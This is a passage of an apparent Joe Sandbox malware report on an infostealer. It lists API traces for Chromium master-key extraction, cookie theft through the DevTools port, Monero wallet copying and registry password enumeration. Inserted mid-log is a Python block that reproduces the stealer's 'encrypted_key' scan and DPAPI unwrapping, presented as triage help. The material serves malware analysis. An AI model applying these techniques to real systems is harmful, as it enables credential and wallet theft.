                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 8bcced13945f3c2ad2bfa0d94b55c91163f60472276479fe3b57baef9b3e2fd8
                                        • Instruction ID: 52835e15ed5749514f18d0697d4af0d99c6c413f6d6caee561800fa5514db105
                                        • Opcode Fuzzy Hash: 8bcced13945f3c2ad2bfa0d94b55c91163f60472276479fe3b57baef9b3e2fd8
                                        • Instruction Fuzzy Hash: DF5173719006089BDB14EBE4DC5AFEE7778AF04701F406598F10AB7095EF356A88CF61
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E162D0: InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
                                          • Part of subcall function 00E162D0: StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16353
                                          • Part of subcall function 00E162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
                                          • Part of subcall function 00E162D0: HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
                                          • Part of subcall function 00E162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
                                          • Part of subcall function 00E162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25568
                                        • lstrlen.KERNEL32(00000000), ref: 00E2557F
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00E255B4
                                        • lstrlen.KERNEL32(00000000), ref: 00E255D3
                                        • lstrlen.KERNEL32(00000000), ref: 00E255FE
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 4b9a0c0af7a9a5a975e17f3819cc9b0811b0dfcfe57de7af3b72a235053abe80
                                        • Instruction ID: 09524bb1de6c5f890332e0d203fec9e85253fab7873f0a4c6fe63b54114cb94c
                                        • Opcode Fuzzy Hash: 4b9a0c0af7a9a5a975e17f3819cc9b0811b0dfcfe57de7af3b72a235053abe80
                                        • Instruction Fuzzy Hash: 97510E709101189BCB18FF64EDA6BED77B9AF10340F586468F9067B592EF306B44CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: bb943c3f81f6599dd4301bb8711be14cfe6e856966e4205673b82df79aa774f0
                                        • Instruction ID: fd56222fd1c2cb2c99212282ed8cf5d1a35b6aa16de8168304e57059b12e8418
                                        • Opcode Fuzzy Hash: bb943c3f81f6599dd4301bb8711be14cfe6e856966e4205673b82df79aa774f0
                                        • Instruction Fuzzy Hash: 13C194B59001299BCB14EF60EC9AFDE73B9BF64304F0455D8F409B7242DA75AA84CF91
                                        APIs
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E2453C
                                        • lstrcat.KERNEL32(?,01A8EEA8), ref: 00E2455B
                                        • lstrcat.KERNEL32(?,?), ref: 00E2456F
                                        • lstrcat.KERNEL32(?,01A8D690), ref: 00E24583
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E28F20: GetFileAttributesA.KERNEL32(00000000,?,00E11B94,?,?,00E3577C,?,?,00E30E22), ref: 00E28F2F
                                          • Part of subcall function 00E1A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E1A489
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E29550: GlobalAlloc.KERNEL32(00000000,-F,00E2462D), ref: 00E29563
                                        • StrStrA.SHLWAPI(?,01A8EF68), ref: 00E24643
                                        • GlobalFree.KERNEL32(?), ref: 00E24762
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
                                          • Part of subcall function 00E1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
                                          • Part of subcall function 00E1A210: LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E246F3
                                        • StrCmpCA.SHLWAPI(?,00E308D2), ref: 00E24710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E24722
                                        • lstrcat.KERNEL32(00000000,?), ref: 00E24735
                                        • lstrcat.KERNEL32(00000000,00E30FA0), ref: 00E24744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 79b9fd7e26d11aa3142e09aadeaaf4f164ab79735218650d3051ce52cb36f1c4
                                        • Instruction ID: c99c6a4c5c3f6c74c0e2ffad6e612e634094e2614636d359b5d84cb751d90849
                                        • Opcode Fuzzy Hash: 79b9fd7e26d11aa3142e09aadeaaf4f164ab79735218650d3051ce52cb36f1c4
                                        • Instruction Fuzzy Hash: 4771C8B6900218ABDB14EBA0ED46FEE73B9AF88700F045598F605B7185EB35DB44CF91
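The record above shows the Chromium master-key handling common to this stealer family: a StrStrA scan for the literal marker `"encrypted_key":"` in the browser's Local State file, then CryptStringToBinaryA with dwFlags = 1 (CRYPT_STRING_BASE64), called twice in the usual size-then-decode pattern. The following is an added example, not code from the sample or from Joe Sandbox, that reproduces that extraction in Python next to the way an analyst should do it. The Local State fixture and the blob bytes are constructed; the 5-byte "DPAPI" tag and the CryptProtectData header (dwVersion = 1 followed by the DPAPI provider GUID) are the documented Chromium and Windows formats. It also shows the failure mode the marker scan has that a JSON parse does not: a Local State written with whitespace after the colon.

```python
import base64
import json

DPAPI_TAG = b"DPAPI"                     # tag Chromium prepends to the blob before base64
DPAPI_VERSION = b"\x01\x00\x00\x00"      # dwVersion field of a CryptProtectData blob
# {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}, the DPAPI provider GUID, in its on-disk
# little-endian byte order.
DPAPI_PROVIDER_GUID = bytes.fromhex("d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed fixture: NOT a real CryptProtectData output, only its version and
# provider-GUID header followed by filler bytes. A real blob can be unwrapped
# only by CryptUnprotectData inside the victim's own logon session.
FAKE_BLOB = DPAPI_VERSION + DPAPI_PROVIDER_GUID + bytes(range(32))
_local_state_obj = {
    "browser": {"enabled_labs_experiments": []},
    "os_crypt": {"encrypted_key": base64.b64encode(DPAPI_TAG + FAKE_BLOB).decode()},
}
# Chromium writes Local State compact (no space after ':'), which is exactly what
# the sample's StrStrA marker relies on.
LOCAL_STATE_COMPACT = json.dumps(_local_state_obj, separators=(",", ":"))
# The same content pretty-printed, e.g. after an analyst has re-saved the file.
LOCAL_STATE_PRETTY = json.dumps(_local_state_obj, indent=2)


def extract_key_like_stealer(local_state: str) -> str:
    """Reproduce the marker scan seen in the report: StrStrA for '"encrypted_key":"',
    then take everything up to the next double quote. No JSON parsing."""
    marker = '"encrypted_key":"'
    start = local_state.find(marker)
    if start < 0:
        raise ValueError('"encrypted_key":" marker not found')
    start += len(marker)
    return local_state[start:local_state.index('"', start)]


def extract_key_properly(local_state: str) -> str:
    """What an analyst should do instead: parse the JSON and read os_crypt.encrypted_key."""
    return json.loads(local_state)["os_crypt"]["encrypted_key"]


def stealer_scan_breaks_on(local_state: str) -> bool:
    """True when the marker scan fails on input that a JSON parse handles."""
    try:
        extract_key_like_stealer(local_state)
        return False
    except ValueError:
        return True


def unwrap_master_key_blob(encoded: str) -> bytes:
    """Base64-decode (the CryptStringToBinaryA(..., CRYPT_STRING_BASE64=1, ...) step; the
    sample calls it twice, first with a NULL output buffer to learn the size) and strip
    the 'DPAPI' tag. The result is still DPAPI-protected, not the AES key itself."""
    raw = base64.b64decode(encoded, validate=True)
    if not raw.startswith(DPAPI_TAG):
        raise ValueError("value is not a DPAPI-wrapped Chromium key")
    return raw[len(DPAPI_TAG):]


def is_dpapi_blob(blob: bytes) -> bool:
    """Sanity check on the stripped value: CryptProtectData blobs begin with
    dwVersion=1 and the DPAPI provider GUID."""
    return blob[:4] == DPAPI_VERSION and blob[4:20] == DPAPI_PROVIDER_GUID


if __name__ == "__main__":
    key = extract_key_properly(LOCAL_STATE_COMPACT)
    blob = unwrap_master_key_blob(key)
    print("stealer scan agrees with JSON parse:", extract_key_like_stealer(LOCAL_STATE_COMPACT) == key)
    print("stripped value is a DPAPI blob:", is_dpapi_blob(blob), "len", len(blob))
    print("stealer scan breaks on pretty-printed Local State:", stealer_scan_breaks_on(LOCAL_STATE_PRETTY))
```

For triage, `is_dpapi_blob` is the useful part: any process that reads Local State and then carries a 5-byte-tagged blob into CryptUnprotectData is doing what this sample does, whatever the rest of the binary looks like.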
                                        APIs
                                          • Part of subcall function 00E112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                          • Part of subcall function 00E112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                          • Part of subcall function 00E112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                          • Part of subcall function 00E112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                          • Part of subcall function 00E112A0: RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1134F
                                        • lstrlen.KERNEL32(?), ref: 00E1135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00E11377
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E11465
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E114EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 9f3858c5b0578f71f79e1a40161507f8eb7c8316fc7dec23b72f0b1347d5152f
                                        • Instruction ID: c6664a48fb6618f89ca609dab7267a5af1ad55f0e729fc78617b7664204271be
                                        • Opcode Fuzzy Hash: 9f3858c5b0578f71f79e1a40161507f8eb7c8316fc7dec23b72f0b1347d5152f
                                        • Instruction Fuzzy Hash: 0A5154B1D5022857CB14FB60ED96FED73BDAF54700F4455E8B60A72081EE306B88CBA6
                                        APIs
                                        • InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E19AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 00E19AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 8c9fa9fdb8f558d0c21b4a1afded9f1f7a97d1e48679c3c69059c8a4c81d9021
                                        • Instruction ID: a477282fc353eca7e22bb35d689fe7ed9730d6157b915f072513ce8068ea8b6d
                                        • Opcode Fuzzy Hash: 8c9fa9fdb8f558d0c21b4a1afded9f1f7a97d1e48679c3c69059c8a4c81d9021
                                        • Instruction Fuzzy Hash: 67415C35A50218ABCB24EFA4DC95FDDB7B4BB48740F105098F149BB191CBB4AEC0CB60
                                        APIs
                                          • Part of subcall function 00E17330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1739A
                                          • Part of subcall function 00E17330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E17411
                                          • Part of subcall function 00E17330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1746D
                                          • Part of subcall function 00E17330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E174B2
                                          • Part of subcall function 00E17330: HeapFree.KERNEL32(00000000), ref: 00E174B9
                                        • lstrcat.KERNEL32(00000000,00E3192C), ref: 00E17666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E176A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 00E176BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E176EF
                                        • lstrcat.KERNEL32(00000000,00E31934), ref: 00E17700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E17733
                                        • lstrcat.KERNEL32(00000000,00E31938), ref: 00E1774D
                                        • task.LIBCPMTD ref: 00E1775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: 704c7104541f049207de8216530d4e0e7a9f4c865c886968a9f90e3e8dff6425
                                        • Instruction ID: dfe981441b356d6da3b06a4281742f04fb5a64d5d966e851faa1d6dd490e17e5
                                        • Opcode Fuzzy Hash: 704c7104541f049207de8216530d4e0e7a9f4c865c886968a9f90e3e8dff6425
                                        • Instruction Fuzzy Hash: 5531A176E00108EBDB18EBE0DD95DFF77F8AB44701F105119F142BB294CA39A985CB90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01A8ECC8,00000000,?,00E30E14,00000000,?,00000000), ref: 00E282C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E282C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E282E8
                                        • __aulldiv.LIBCMT ref: 00E28302
                                        • __aulldiv.LIBCMT ref: 00E28310
                                        • wsprintfA.USER32 ref: 00E2833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 1c3e386dca8c1c5b3bbb258853d7959aedfa9b792e99b386f31315299e507f73
                                        • Instruction ID: c4e5ffd1749861a38f20aa071c285c9061ed6f7b83913310e80ce3d6036d30d2
